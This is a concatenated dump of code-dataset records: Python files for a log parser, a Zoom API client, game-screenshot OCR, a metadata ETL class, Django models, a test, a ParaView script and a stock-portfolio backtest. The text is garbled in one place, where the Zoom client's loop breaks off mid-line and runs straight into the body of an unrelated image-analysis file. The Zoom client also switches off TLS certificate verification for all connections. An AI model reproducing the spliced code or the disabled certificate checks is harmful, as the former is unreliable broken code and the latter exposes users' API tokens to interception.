my_lp_problem.variables():\n    print(\"{} = {}\".format(variable.name, variable.varValue))\n","sub_path":"Internacional/Solución/Iteraciones Modelos/modelo_complejo3.py","file_name":"modelo_complejo3.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"513513198","text":"import gzip\nimport sys\nfile = \"/Users/roc/Desktop/access1610.log.gz\"\n# file = sys.argv[1]\n\n# It means that r defaults to rb, and if you want text you have to specify it using rt\nwith gzip.open(file, mode='rt', encoding='utf-8') as f:\n    for lines in f:\n        line = lines.strip().split('\"')\n        if line[0].startswith(\"#\"):\n            continue\n        date = line[0].split('\"')\n        date = date[0]\n        user = line[1]\n        srcip = line[2].split(' ')\n        srcip = srcip[2]\n\n        dstip = line[2].split(' ')\n        dstip = dstip[1]\n\n        statuscode = line[2].split(' ')\n        statuscode = statuscode[3]\n\n        method = line[3].split(' ')\n        method = method[0]\n\n        url = line[3].split(' ')\n        url = url[1]\n\n        byte = line[10].split(' ')\n        c2sbyte = byte[1]\n\n        if len(byte) < 3:\n            s2cbyte = \"\"\n        else:\n            s2cbyte = byte[2]\n\n        print('\"' + date + '\",\"' + user + '\",\"' + srcip + '\",\"' + dstip + '\",\"' + statuscode + '\",\"' + method + '\",\"' + url + '\",\"' + c2sbyte + '\",\"' + s2cbyte + '\"')\n\n","sub_path":"gzip_log.py","file_name":"gzip_log.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"528647804","text":"import http.client\nimport json\nimport time\nimport datetime as dt\nimport ssl\n\n\ndef get_all_users(token):\n\n\n ssl._create_default_https_context = ssl._create_unverified_context\n today = dt.datetime.strftime(dt.datetime.utcnow(),'%Y-%m-%d')\n conn = http.client.HTTPSConnection(\"api.zoom.us\")\n\n headers = {\n 'authorization': \"Bearer %s\" % token ,\n 'content-type': \"application/json\"\n }\n\n conn.request(\"GET\", \"/v2/users?page_number=1&page_size=300&status=active\", headers=headers)\n\n res = conn.getresponse()\n data = res.read()\n\n\n all_data = json.loads(data.decode(\"utf-8\"))\n\n\n page_count = all_data['page_count']\n master_user_list = all_data['users']\n\n print(page_count)\n\n i=2\n while i 2 :\n parameter = re.findall(r'\\d+', realString[2])\n Request['army']['fill_in'] = parameter[0]\n Request['army']['max'] = parameter[1]\n if len(parameter) > 3 :\n Request['spells']['fill_in'] = parameter[2]\n Request['spells']['max'] = parameter[3]\n else :\n Request['spells']['fill_in'] = 0\n Request['spells']['max'] = 0\n\n if len(parameter) > 5 :\n Request['device']['fill_in'] = parameter[4]\n Request['device']['max'] = parameter[5]\n else :\n Request['device']['fill_in'] = 0\n Request['device']['max'] = 0\n Request['position'] = None\n return Request\n\n def getImageRequestList(self, imageName) :\n ''' 返回图片中所有捐赠请求信息 '''\n pendingImage = Image.open(imageName)\n pendingImage = pendingImage.transpose(Image.ROTATE_90)\n pendingImage = pendingImage.crop((0, 100, self.dialogWidth, self.dialogheigth))\n # pendingImage.show()\n # 获得捐赠按钮所在位置\n newImage = self.processImage(pendingImage, lambda x, y, z : not (y > 200 and z < 100))\n buttonPostionList = self.locateDialogBoxList(newImage, 600)\n # for index in buttonPostionList :\n # print(index)\n\n # 获得横线\n newImage = self.processImage(pendingImage, lambda x, y, z : not (y < 50 and z < 50))\n horizontalLineList = self.locateDialogBoxList(newImage, 500)\n # for index in horizontalLineList:\n # print(index)\n\n # 获得按钮所在的单元\n rangList = []\n for index in buttonPostionList :\n i = 0\n while i < len(horizontalLineList) :\n if index[1] < horizontalLineList[i][1] :\n rangList.append(i)\n break\n else :\n i += 1\n if i == len(horizontalLineList) :\n rangList.append(i)\n # for index in rangList:\n # print(index)\n\n # 剪裁按钮所在的位置\n requestList = []\n m = 0\n for index in rangList :\n if index == 0 :\n cellBox = pendingImage.crop((0, 2, 500, horizontalLineList[index][1]))\n elif index == len(horizontalLineList) :\n cellBox = pendingImage.crop((0 , horizontalLineList[index - 1][1] + 84, 500, self.dialogheigth))\n else :\n cellBox = pendingImage.crop((0 , horizontalLineList[index - 1][1] + 84, 500, horizontalLineList[index][1]))\n cellBox = self.processImage(cellBox, lambda x, y, z : x >= 200 and y >= 200 and z >= 200 and abs(x - y) < 3 and abs(x - z) < 3 and abs(y - z) < 3)\n # cellBox.show()\n pendingString = self.m_myOrc.getString(cellBox)\n Request = self.translateStringToRequest(pendingString)\n Request['position'] = buttonPostionList[m]\n m += 1\n requestList.append(Request)\n return requestList\n\n def locateDialogBoxList(self, image, number):\n image = image.convert(\"RGB\")\n pixdata = image.load()\n box_list = []\n y = 0\n x = number\n while y < image.size[1] :\n if pixdata [x, y] == (255, 255, 255) :\n box = (x , y)\n box_list.append(box)\n y += 100\n else :\n y += 1\n return box_list\n\n def pasteImage(self, image) :\n width, height = image.size\n newImage = Image.new('RGB', (width, height), (0, 0, 0))\n 
        newImage.paste(image, (0, 0))\n        return newImage\n\n    def processImage(self, image, logicExpression) :\n        ''' Convert the image to black and white using the given predicate '''\n        newImage = self.pasteImage(image)\n        newImage = newImage.convert(\"RGB\")\n        pixdata = newImage.load()\n        for y in range(newImage.size[1]):\n            for x in range(newImage.size[0]):\n                if logicExpression(pixdata[x, y][0], pixdata[x, y][1], pixdata[x, y][2]):\n                    pixdata[x, y] = (0, 0, 0)\n                else:\n                    pixdata[x, y] = (255, 255, 255)\n        return newImage\n\n\n\ninstpictureAnalysis = pictureAnalysis()\nprint(instpictureAnalysis.getImageRequestList(os.getcwd() + \"\\\\picture\\\\screenshort.png\"))","sub_path":"pictureAnalysis.py","file_name":"pictureAnalysis.py","file_ext":"py","file_size_in_byte":5390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"112830808","text":"import psycopg2\nimport sys\nimport datetime\nimport json\nimport SQLScript\nimport Metadata\n\nclass MetadataETL:\n    # class for working with metadata\n\n    @staticmethod\n    # inserts a new object into the metadata\n    # object_type - type of the object (source, table, column, etc.)\n    # link_object_id - key of the object to link to (example: source - table)\n    # 1 - the insert succeeded\n    # 0 - an error occurred\n    def InsertObject(object_type, object_attr, link_object=None):\n        # object_type - type of the object\n        # object_attr - attributes of the object\n        # link_object - list of objects the inserted object has to be linked to\n        # {\"link_object_type\":\"type of the linked object\";\"link_object_id\":\"id of the linked object\"}\n        result = {}\n        error = []\n        if object_type == \"table\":\n            # check whether the table already exists\n            table_exst_sql = SQLScript.SQLScript.ObjectNameCheck(object_attr.get(\"table_name\",None), object_type,object_attr.get(\"schema\",None))\n            Metadata.Metadata.crsr.execute(table_exst_sql)\n            table_exst = Metadata.Metadata.crsr.fetchall()\n            if int(table_exst[0][0]) > 0:\n                error.clear()\n                error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":\"Table already exists\"})\n                result.update({\"result\":[{\"result\":None,\"error\":error}]})\n                return result\n\n        # compute the max id\n        max_id_sql = SQLScript.SQLScript.MaxObjectId(object_type)\n        Metadata.Metadata.crsr.execute(max_id_sql)\n        max_id = Metadata.Metadata.crsr.fetchall()\n        object_id = int(max_id[0][0]) + 1\n\n        # query to insert the new id\n        insert_object_sql = SQLScript.SQLScript.InsertObject(object_type,object_id)\n\n        # query to insert the object's attributes\n        insert_obj_prm_sql = SQLScript.SQLScript.InsertObjectAttr(object_type,object_id, object_attr)\n\n        # query to link the object to other objects\n        insert_obj_lnk_sql=\"\"\n        for lnk_object in link_object:\n            # check that the linked object exists\n            lnk_exst_sql = SQLScript.SQLScript.ObjectCheck(lnk_object.get(\"link_object_id\",None), lnk_object.get(\"link_object_type\",None))\n            Metadata.Metadata.crsr.execute(lnk_exst_sql)\n            source_exst = Metadata.Metadata.crsr.fetchall()\n            if int(source_exst[0][0]) == 0:\n                error.clear()\n                error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":lnk_object.get(\"link_object_type\",None)+\" isn't found\"})\n                result.update({\"result\":[{\"result\":None,\"error\":error}]})\n                return result\n\n            insert_obj_lnk_sql = insert_obj_lnk_sql + SQLScript.SQLScript.InsertLinkObject(lnk_object.get(\"link_object_type\",None),object_type,lnk_object.get(\"link_object_id\",None),object_id)\n\n        # execute the query\n        insert_sql = insert_object_sql+insert_obj_prm_sql+insert_obj_lnk_sql\n        try:\n            Metadata.Metadata.crsr.execute(insert_sql)\n            result.clear()\n            result.update({\"result\":[{\"result\":\"Success\",\"object_id\":object_id,\"error\":error}]})\n        except:\n            Metadata.Metadata.crsr.rollback()\n            error.clear()\n            error.append({\"error_flg\":\"1\",\"error_code\":\"0000151\",\"error_text\":\"Something is wrong\"})\n            result.update({\"result\":[{\"result\":None,\"error\":error}]})\n\n        return result\n\n    @staticmethod\n    def UpdateObject(object_type, object_id, change_type, object_attr=None, link_object_id=None):\n        # change_type: 1 - change the object attributes given in object_attr (every attribute listed in the array will be changed)\n        #              2 - change a link (link_object_id must be set)\n        result = {}\n        error = []\n        # check that the object exists\n        obj_exst_sql = SQLScript.SQLScript.ObjectCheck(object_id,object_type)\n        Metadata.Metadata.crsr.execute(obj_exst_sql)\n        obj_exst = Metadata.Metadata.crsr.fetchall()\n        if int(obj_exst[0][0]) == 0:\n            error.clear()\n            error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":object_type+\" isn't found\"})\n            result.update({\"result\":[{\"result\":None,\"error\":error}]})\n            return result\n        upd_obj_sql=\"\"\n        if change_type==1:\n            del_obj_attr_sql = \"\"\n            for obj_attr in object_attr:\n                del_obj_attr_sql = del_obj_attr_sql+SQLScript.SQLScript.DeleteObjectAttr(object_type, object_id, obj_attr)\n            ins_obj_attr_sql = SQLScript.SQLScript.InsertObjectAttr(object_type,object_id, object_attr)\n            upd_obj_sql = del_obj_attr_sql+ins_obj_attr_sql\n        if change_type==2:\n            link_object_type=\"\"\n            if object_type==\"table\":\n                link_object_type=\"source\"\n            if object_type==\"column\":\n                link_object_type=\"table\"\n            # check that the linked object exists\n            lnk_exst_sql = SQLScript.SQLScript.ObjectCheck(link_object_id,link_object_type)\n            Metadata.Metadata.crsr.execute(lnk_exst_sql)\n            lnk_exst = Metadata.Metadata.crsr.fetchall()\n            if int(lnk_exst[0][0]) == 0:\n                error.clear()\n                error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":link_object_type+\" isn't found\"})\n                result.update({\"result\":[{\"result\":None,\"error\":error}]})\n                return result\n            del_lnk_obj_sql = SQLScript.SQLScript.DeleteAllLinkObject(link_object_type, object_type, object_id)\n            ins_lnk_obj_sql = SQLScript.SQLScript.InsertLinkObject(link_object_type,object_type,link_object_id,object_id)\n            upd_obj_sql=del_lnk_obj_sql+ins_lnk_obj_sql\n        # execute the query\n        try:\n            Metadata.Metadata.crsr.execute(upd_obj_sql)\n            result.clear()\n            result.update({\"result\":[{\"result\":\"Successful\",\"error\":error}]})\n        except:\n            Metadata.Metadata.crsr.rollback()\n            error.clear()\n            error.append({\"error_flg\":\"1\",\"error_code\":\"0000151\",\"error_text\":\"Something is wrong\"})\n            result.update({\"result\":[{\"result\":None,\"error\":error}]})\n\n        return result\n    @staticmethod\n    def DeleteObject(object_type, object_id):\n        # delete an object from the metadata (set its disable_flg)\n        result = {}\n        error = []\n        # check that the object exists\n        obj_exst_sql = SQLScript.SQLScript.ObjectCheck(object_id,object_type)\n        Metadata.Metadata.crsr.execute(obj_exst_sql)\n        obj_exst = Metadata.Metadata.crsr.fetchall()\n        if int(obj_exst[0][0]) == 0:\n            error.clear()\n            error.append({\"error_flg\":1,\"error_code\":\"0000150\",\"error_text\":object_type+\" isn't found\"})\n            result.update({\"result\":[{\"result\":None,\"error\":error}]})\n            return result\n\n        del_obj_sql=SQLScript.SQLScript.DeleteObject(object_type, object_id)\n\n        del_lnk_obj_sql=\"\"\n        if object_type in (\"table\",\"column\"):\n            link_object_type=\"\"\n            if object_type==\"table\":\n                link_object_type=\"source\"\n            if object_type==\"column\":\n                link_object_type=\"table\"\n            del_lnk_obj_sql=SQLScript.SQLScript.DeleteAllLinkObject(link_object_type,object_type, object_id)\n        delete_sql=del_obj_sql+del_lnk_obj_sql\n        # execute the query\n        try:\n            Metadata.Metadata.crsr.execute(delete_sql)\n            result.clear()\n            result.update({\"result\":[{\"result\":\"Successful\",\"error\":error}]})\n        except:\n            Metadata.Metadata.crsr.rollback()\n            error.clear()\n            error.append({\"error_flg\":\"1\",\"error_code\":\"0000151\",\"error_text\":\"Something is wrong\"})\n            result.update({\"result\":[{\"result\":None,\"error\":error}]})\n\n        return result\n","sub_path":"MetadataETL.py","file_name":"MetadataETL.py","file_ext":"py","file_size_in_byte":8575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"533484510","text":"from django.db import models\nfrom django.contrib.gis.db import models as geomodels\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom django.utils import timezone\n\n\nPRIVACY = [('Private', 'Private'),\n           ('Shared', 'Shared'),\n           ('Public', 'Public')]\n\n\nclass Face(models.Model):\n    name = models.CharField(max_length=128, blank=True, null=True)\n    x = models.IntegerField()\n    y = models.IntegerField()\n    width = models.IntegerField()\n    height = models.IntegerField()\n\n\n@python_2_unicode_compatible\nclass Photo(models.Model):\n    faces = models.ManyToManyField(Face, related_name='photos', blank=True, null=True)\n    file = models.ImageField(upload_to='photo_files/%Y-%m-%d')\n    owner = models.ForeignKey(User, null=False, related_name='photos')\n    title = models.CharField(max_length=128)\n    description = models.TextField(blank=True)\n    date_uploaded = models.DateTimeField(auto_now_add=True)\n    date_modified = models.DateTimeField(auto_now=True)\n    date_published = models.DateTimeField(auto_now_add=True)\n    privacy = models.CharField(max_length=7, choices=PRIVACY, default='Public')\n    geom = geomodels.PointField(null=True, blank=True)\n\n    def __str__(self):\n        return 
self.title\n\n\n@python_2_unicode_compatible\nclass Album(models.Model):\n    photos = models.ManyToManyField(Photo, related_name='photos')\n    cover = models.ForeignKey(Photo, related_name='cover', blank=True, null=True)\n    owner = models.ForeignKey(User, null=False, related_name='albums')\n    title = models.CharField(max_length=128)\n    description = models.TextField(blank=True)\n    date_uploaded = models.DateTimeField(default=timezone.now)\n    date_modified = models.DateTimeField(default=timezone.now)\n    date_published = models.DateTimeField(default=timezone.now)\n    privacy = models.CharField(max_length=7, choices=PRIVACY, default='Public')\n\n    def __str__(self):\n        return self.title\n","sub_path":"imagersite/imager_images/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"28739263","text":"from app import settings\nfrom tests.integration.integration_test_case import IntegrationTestCase\n\n\nclass TestApplicationVariables(IntegrationTestCase):\n\n    def setUp(self):\n        settings.EQ_ENABLE_FLASK_DEBUG_TOOLBAR = True\n        settings.EQ_DEV_MODE = True\n        settings.EQ_ENABLE_LIVE_RELOAD = True\n        settings.EQ_UA_ID = 'TestId'\n        super().setUp()\n\n    def tearDown(self):\n        super().tearDown()\n        settings.EQ_ENABLE_FLASK_DEBUG_TOOLBAR = False\n        settings.EQ_DEV_MODE = False\n        settings.EQ_ENABLE_LIVE_RELOAD = False\n        settings.EQ_UA_ID = None\n\n    def test_flask_toolbar_is_displayed(self):\n        self.launchSurvey('0', 'star_wars')\n        self.assertStatusOK()\n        self.assertInBody('flDebugToolbarHandle')\n\n    def test_google_analytics_code_is_present(self):\n        self.launchSurvey('0', 'star_wars')\n        self.assertStatusOK()\n        self.assertInHead('GoogleAnalyticsObject')\n\n    def test_livereload_script_rendered(self):\n        self.launchSurvey('0', 'star_wars')\n        self.assertStatusOK()\n        self.assertTrue('__bs_script__' in self.getResponseData())\n","sub_path":"tests/integration/test_application_variables.py","file_name":"test_application_variables.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"63482683","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\nparaview.simple._DisableFirstRenderCameraReset()\n\n# find source\ngaussian_1dxmf = FindSource('gaussian_1d.xmf')\n\n# create a new 'Contour'\ncontour1 = Contour(Input=gaussian_1dxmf)\ncontour1.ContourBy = ['POINTS', 'phi']\ncontour1.Isosurfaces = [0.0]\ncontour1.PointMergeMethod = 'Uniform Binning'\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# show data in view\ncontour1Display = Show(contour1, renderView1)\n\n# save data\nanimationScene1 = GetAnimationScene()\nnOut = 102\n\nfor i in range(nOut):\n    if i < 10:\n        str_i = '00' + str(i)\n    elif i < 100:\n        str_i = '0' + str(i)\n    else:\n        str_i = str(i)\n    #\n    pre_path = '/home/mquezada/Desktop/mql/work/KAUST/shallow_water_periodic_bathymetry/FEM/2D/gaussian/small_domain/post_processing/DATA/data'\n    SaveData(pre_path + str_i + '.csv', proxy=contour1)\n    animationScene1.GoToNext() \n#\n\n","sub_path":"FEM/2D/gaussian/small_domain/post_processing/export_1d_data_paraview.py","file_name":"export_1d_data_paraview.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"65846747","text":"import datetime\nimport os\nimport gc\nimport time\nfrom time import time,
sleep\nimport glob\nimport csaps\nimport itertools\nfrom datetime import datetime, timedelta, date\nfrom pulp import LpProblem, LpVariable, lpSum, LpMaximize, value, LpInteger\nfrom time import time, sleep\nimport pstats\nimport statistics\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport multiprocessing as mp\nimport matplotlib\nfrom matplotlib import rc\nimport plotly\nimport plotly_express\nfrom multiprocessing import Pool\n\n\nmatplotlib.use('TkAgg')\npd.options.mode.chained_assignment = None  # default='warn'\n\nprint(\"Number of processors: \", mp.cpu_count())\nos.environ[\"MODIN_ENGINE\"] = \"dask\"\nimport modin.pandas as pd_modin\n\ndef startup():\n    matplotlib.use('TkAgg')\n    pd.options.mode.chained_assignment = None  # default='warn'\n    print(\"Number of processors: \", mp.cpu_count())\n    exec(open(\"pyESN.py\").read())\n\n\ndef read_data(chunksize):\n    cols = ['Ticker', 'Date', 'Open', 'High', 'Low', 'Close', 'Adj Close', 'Volume']\n    full_datas = pd.DataFrame(columns=cols)\n    path = '/Users/jasonrubenstein/Desktop/Python/QuantFin1/StockData/*.csv'\n    stock_files = glob.glob(path)\n    for i in stock_files:\n        sd = pd_modin.read_csv(i, chunksize=chunksize,\n                     iterator=True)\n        stock_data = pd_modin.concat(sd, ignore_index=True)\n        full_datas = full_datas.append(stock_data, ignore_index=True)\n    # sd = pd.read_csv('~/Desktop/Python/QuantFin1/StockData/stock_data2020-03-19.csv',\n    #                  chunksize=chunksize, iterator=True)\n    # stock_data = pd.concat(sd, ignore_index=True)\n    print(\"Most recent date on file = \" + str(full_datas['Date'].max()) + \"\\n\")\n    print(\"Most ancient date on file = \" + str(full_datas['Date'].min()) + \"\\n\")\n    # the original returned a (frame, None) tuple here and left the second print unreachable\n    return full_datas\n\n\nstock_data = read_data(100000)\n\n\nticker_options = 0\nprint(\"Type 1 for Apple and Amazon only, or 0 for all stocks\" + \"\\n\" +\n      \"Typing 0 may lead to increased run time on derivative calculations\")\nticker_options = input()\n\n\nif ticker_options == '1':  # input() returns a string, so compare against '1', not the int 1\n    stock_data = stock_data[(stock_data['Ticker'] == \"AAPL\") | (stock_data['Ticker'] == \"AMZN\")]\nelse:\n    pass\n\n\nclass Adjustments:\n    \n    def general_fixes(df):\n        df.rename(columns={'Adj Close': 'Adj_Close'}, inplace=True)\n        df['DateID'] = pd.factorize(df['Date'])[0]\n        df['Prev_Close'] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1)\n        df['pct_change'] = 0\n        df['pct_change'] = (df['Adj_Close'] - df['Open'])/df['Open'] * 100\n        df['Prev_pct_change'] = df.groupby(\"Ticker\")[\"pct_change\"].shift(1)\n        df['Prev_volume'] = df.groupby(\"Ticker\")[\"Volume\"].shift(1)\n        df[\"Date\"] = pd.to_datetime(df[\"Date\"])\n        return df\n\n\n    def simple_momentum(df):\n        df[\"12_Day_Momentum\"] = 0\n        df[\"26_Day_Momentum\"] = 0\n        df[\"270_Day_Momentum\"] = 0\n        df.loc[:, \"12_Day_Momentum\"] = (\n            df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1) / df.groupby(\"Ticker\")[\"Adj_Close\"].shift(\n            12) - 1)\n        df.loc[:, \"26_Day_Momentum\"] = (\n            df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1) / df.groupby(\"Ticker\")[\"Adj_Close\"].shift(\n            26) - 1)\n        df.loc[:, \"270_Day_Momentum\"] = (\n            df.groupby(\"Ticker\")[\"Adj_Close\"].shift(1) / df.groupby(\"Ticker\")[\"Adj_Close\"].shift(\n            261) - 1)  # note: shifts 261 rows (~one trading year) despite the 270 in the column name\n        return df\n\n\n    def macd(df):\n        df['12_day_ema'] = 0\n        df['26_day_ema'] = 0\n        df['MACD'] = 0\n        ema_12 = df.groupby(\"Ticker\").apply(lambda x: x[\"Adj_Close\"].ewm(span=12).mean())\n        ema_26 = df.groupby(\"Ticker\").apply(lambda x: x[\"Adj_Close\"].ewm(span=26).mean())\n        df[\"12_day_ema\"] = ema_12.reset_index(level=0, drop=True)\n        df[\"26_day_ema\"] = ema_26.reset_index(level=0, drop=True)\n        
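For reference, the MACD construction in `Adjustments.macd` — the difference of 12- and 26-period EMAs, then smoothed by a 9-period EMA — can be sketched on a single price series. Note that the script later stores the 9-period smoothing back into the `MACD` column, so that column ends up holding the signal line. A minimal sketch (the column names are illustrative):

```python
import pandas as pd

def macd_single(close: pd.Series) -> pd.DataFrame:
    # MACD line: fast EMA minus slow EMA; signal line: 9-period EMA of MACD.
    ema_fast = close.ewm(span=12).mean()
    ema_slow = close.ewm(span=26).mean()
    macd_line = ema_fast - ema_slow
    signal = macd_line.ewm(span=9).mean()
    return pd.DataFrame({"macd": macd_line, "signal": signal})
```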
df[\"MACD\"] = df[\"12_day_ema\"] - df[\"26_day_ema\"]\n MACD = df.groupby(\"Ticker\").apply(lambda x: x[\"MACD\"].ewm(span=9).mean())\n df[\"MACD\"] = MACD.reset_index(level=0, drop=True)\n return df\n\n\n def twelve_two_month_price(df):\n if df.groupby(\"Ticker\")[\"Adj_Close\"].shift(263) is not None:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(263)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(262) is not None:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(262)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(261) is not None:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(261)\n else:\n df.loc[:, \"12_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(260)\n #\n if df.groupby(\"Ticker\")[\"Adj_Close\"].shift(46) is not None:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(46)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(45) is not None:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(45)\n elif df.groupby(\"Ticker\")[\"Adj_Close\"].shift(44) is not None:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(44)\n else:\n df.loc[:, \"2_month_price\"] = df.groupby(\"Ticker\")[\"Adj_Close\"].shift(43)\n df['30_day_12_2_momentum'] = 0\n df['12_2_change'] = (df['2_month_price'] - df['12_month_price']) / df['12_month_price']\n df['12_2_momentum'] = (df['2_month_price'] - df['12_month_price'])\n df.loc[:, \"30_day_12_2_momentum\"] = df.groupby(\"Ticker\")[\"12_2_momentum\"].shift(30)\n # Add buy signal\n df['buy'] = np.where(df['pct_change'] > 0, 1, 0)\n return df\n\n\n\n def mu_pct_change(df):\n ema_pct_change = df.groupby(\"Ticker\").apply(lambda x: x[\"Prev_pct_change\"].ewm(span=100).mean())\n df[\"100_day_µ_pct_change\"] = ema_pct_change.reset_index(level=0, drop=True)\n ema_volume = df.groupby(\"Ticker\").apply(lambda x: x[\"Prev_volume\"].ewm(span=100).mean())\n df[\"100_day_µ_volume\"] = ema_volume.reset_index(level=0, drop=True)\n return df\n\n# Choose whatever indicators you want to use or functions to run\nworking_data_all = Adjustments.general_fixes(stock_data)\nworking_data_all = Adjustments.macd(working_data_all)\n\n###### FUNDS ######\nprint(\"Enter funds constraint (don't make super high since max n-qty of individual stock):\\n\")\nFUNDS = int(input())\n\n###### INDICATOR ######\nprint(\"Choose indicator (MACD, 30_day_12_2_momentum, 100_day_µ_pct_change)?:\\n\")\nINDICATOR = str(input())\n\n###### START DATE ######\nprint(\"Start Date (year * month * day):\\n\")\nSYEAR, SMONTH, SDAY = int(input()), int(input()), int(input())\nsdate = date(SYEAR, SMONTH, SDAY)\n\n###### END DATE ######\nprint(\"End Date (year * month * day):\\n\")\nEYEAR, EMONTH, EDAY = int(input()), int(input()), int(input())\nedate = date(EYEAR, EMONTH, EDAY)\n\ndaterange = pd.date_range(sdate, edate)\ndates_list = list(daterange.strftime(\"%Y-%m-%d\"))\n\n# Memory check\n# for dtype in ['float', 'int', 'object', 'datetime']:\n# selected_dtype = working_df_use.select_dtypes(include=[dtype])\n# mean_usage_b = selected_dtype.memory_usage(deep=True).mean()\n# mean_usage_mb = mean_usage_b / 1024 ** 2\n# print(\"Average memory usage for {} columns: {:03.2f} MB\".format(dtype,mean_usage_mb))\n\n# Russell 1000 stocks only\nruss = pd.read_csv('~/Desktop/Python/QuantFin1/Russell1000Stocks.csv', sep=\",\")\n\nworking_df_use = working_data_all[(working_data_all['Ticker'].isin(russ['Stock']))].reset_index(drop=True)\n\n# 
Define the dataframe to be appended; run from here\ncols = ['Date', 'DailyGainLoss', 'OpenCost', 'CumulativeGainLoss', 'PosNeg', 'Tickers']\nbook = pd.DataFrame(columns=cols)\n\n# Set iterator k equal to 0\nk = 0\n\n# number of unique dates in dataframe\nunique_dates = len(working_df_use[working_df_use['Date'].isin(dates_list)]['Date'].unique())\n\n\nbad_tickers = [\"TWLO\", \"INVH\", \"VST\", \"FHB\", \"HGV\", \"ARD\"]\n# include only dates in desired range where the indicator is not null\nusable_df = working_df_use[(working_df_use['Date'].isin(dates_list))\n & (pd.notnull(working_df_use[INDICATOR]))\n & (working_df_use['100_day_µ_volume'] > 250000) # volume definition. To add VWMA\n & (~working_df_use['Ticker'].isin(bad_tickers)).reset_index(drop=True)]\n\n# remove unnecessary columns\n# usable_df = usable_df[[\"Ticker\", \"Date\", \"Open\", \"Volume\", \"Adj_Close\",\n# \"pct_change\", \"MACD\", \"30_day_12_2_momentum\"]]\n\nusable_df = usable_df[[\"Ticker\", \"Date\", \"Open\", \"Volume\", \"Adj_Close\",\n \"pct_change\", INDICATOR]]\nprint(len(usable_df))\nprint(len(usable_df['Ticker'].unique()))\n\n# works but time complexity is an issue. It's erratic not necessarily bad\n\nfor i in dates_list:\n usable_df_new = usable_df[~usable_df['Date'].isin(book['Date'])].reset_index(drop=True)\n # if indicator == \"MACD\":\n date_only = usable_df_new[(usable_df_new['Date'] == i)\n & (usable_df_new[INDICATOR] > 0)].reset_index(drop=True)\n data = pd.concat([date_only]*20, ignore_index=True).reset_index(drop=True) # max 20 shares of any individual stock per date\n # data.rename(columns={'index': 'row_id'}, inplace=True)\n # else:\n # date_only = usable_df_new[(usable_df_new['Date'] == i)\n # & (usable_df_new[indicator] > 0)].reset_index(drop=True)\n # data = pd.concat([date_only]*5, ignore_index=True).reset_index()\n if not data.empty:\n start_time = time()\n ticker, open_price, pct_change, metric = data['Ticker'], data['Open'], data['pct_change'], data[INDICATOR]\n # open_price = data['Open']\n # pct_change = data['pct_change']\n # row_id = data['row_id']\n # metric = data[indicator]\n P = range(len(ticker))\n # add in funds determinant based upon prior few days % return (if bunch of negatives invest less of funds)\n if len(book) < 10:\n book['FundSignal'] = 0\n else:\n book['FundSignal'] = book.PosNeg.rolling(window=10).mean().sort_index(level=1).values\n # book['FundSignal'].fillna(0, inplace=True)\n if len(book) < 1:\n S = float(FUNDS)\n elif len(book) > 9 and abs(book.FundSignal.iat[-1]) > float(0.5):\n # use half of funds available\n # book['FundSignal'].fillna(0, inplace=True)\n S = (float(FUNDS) + float(book.CumulativeGainLoss.iat[-1]))*.5\n else:\n S = float(FUNDS)+float(book.CumulativeGainLoss.iat[-1])\n\n # Moving average of last few days book, with binary pos/neg. (e.g. 
if µ last 5 days < -.6, use half of available capital)\n prob = LpProblem(\"Optimal_Portfolio\", LpMaximize)\n x = LpVariable.matrix(\"x\", list(P), 0, 1, LpInteger)\n prob += sum(metric[p] * x[p] for p in P)\n prob += sum(open_price[p] * x[p] for p in P) <= S\n prob.solve()\n open_price = [open_price[p] for p in P if x[p].varValue]\n ticker = [ticker[p] for p in P if x[p].varValue]\n pct_change = [pct_change[p] / 100 for p in P if x[p].varValue]\n # pct_change = [x / 100 for x in pct_change]\n gain_loss = [a * b for a, b in zip(open_price, pct_change)]\n total_yield, total_open_price = np.sum(gain_loss), np.sum(open_price)\n ticker = np.array(ticker)\n # total_open_price = np.sum(open_price)\n # dates, gains, cost = set(), set(), set()\n # dates.add(i)\n # gains.add(total_yield)\n # cost.add(total_open_price)\n # gc.disable()\n book = book.append({\n 'Date': i,\n 'DailyGainLoss': total_yield,\n 'OpenCost': total_open_price,\n 'Tickers': np.unique(ticker)\n },\n ignore_index=True)\n # book['Tickers'] = book.apply(lambda r: tuple(r), 